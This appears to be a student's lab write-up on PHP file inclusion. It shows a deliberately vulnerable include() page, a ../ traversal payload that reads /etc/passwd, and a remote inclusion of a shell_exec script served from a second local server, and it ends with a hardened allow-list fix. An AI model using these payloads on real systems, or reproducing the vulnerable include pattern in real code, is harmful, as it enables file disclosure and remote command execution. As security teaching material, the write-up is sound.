Lab 2.2: File Inclusion Vulnerabilities - FlameSpyro/Tech-Journal GitHub Wiki
- To start off, we needed to create a webpage for testing. This requires additional page1-3.html files in order to work. The following code was provided:
```php
<a href="index.php?page=page1.html"><button>page1</button></a><br/>
<a href="index.php?page=page2.html"><button>page2</button></a><br/>
<a href="index.php?page=page3.html"><button>page3</button></a><br/>
<?php
// Take the page name straight from the query string (user-controlled).
$page = $_GET['page'] ?? null;
echo "<div>";
if(isset($page))
{
    // Deliberately vulnerable for the lab: the unvalidated value goes to include().
    include("$page");
}
else
{
    echo "<p>select a page</p>";
}
echo "</div>";
?>
```
- To start up the server, we run:
```
php -S 127.0.0.1:9000
```
- To show some password information, we need to add the following to the end of the URL:
```
?page=../../../../../../etc/passwd
```
for the following result:
- We can view the operating system by changing the passwd to os-version at the end
- The assignment also needs us to show we can inject a rfl.html script into the homepage. This can be done by creating the file with anything in it (I just button mashed) and starting up another server on port 8000 instead. The URL tagged at the end is
- If we want to do a command injection, we need to create a new script called rfi.php where we enter:
```php
<?php
// Runs a shell command on the server and prints its output.
echo shell_exec("cmd of choice");
?>
```
- Great! Now we just need to inject it into the url
```
?page=http://127.0.0.1:8000/rfi.php
```
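
A hardened version of index.php that rejects both the ../ traversal and the remote include shown above, as an added example that is not part of the original lab. The pages subdirectory and the resolve_page helper are assumptions made for illustration:

```php
<?php
// Hardened index.php (added example, not the lab's code).
// Assumption: page1.html..page3.html live in a "pages" directory next to this script.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['page1.html', 'page2.html', 'page3.html'];

/**
 * Map the user-supplied ?page= value to a file on disk, or return null.
 * resolve_page is a hypothetical helper name.
 */
function resolve_page(?string $requested): ?string
{
    if ($requested === null) {
        return null;
    }
    // 1. Exact allow-list match: ../ sequences, absolute paths and
    //    http:// or php:// wrappers fail because none of them are listed.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Defence in depth: canonicalise (resolving symlinks and ..) and
    //    confirm the result is still inside PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// ?page[]=x arrives as an array, so only accept a plain string.
$raw = $_GET['page'] ?? null;
$page = resolve_page(is_string($raw) ? $raw : null);

echo "<div>";
if ($page !== null) {
    // readfile() sends the bytes as-is; unlike include, it never executes PHP in the file.
    readfile($page);
} else {
    echo "<p>select a page</p>";
}
echo "</div>";
```

Leaving allow_url_include at its default of Off in php.ini also stops include() from fetching the http:// URL used in the last step.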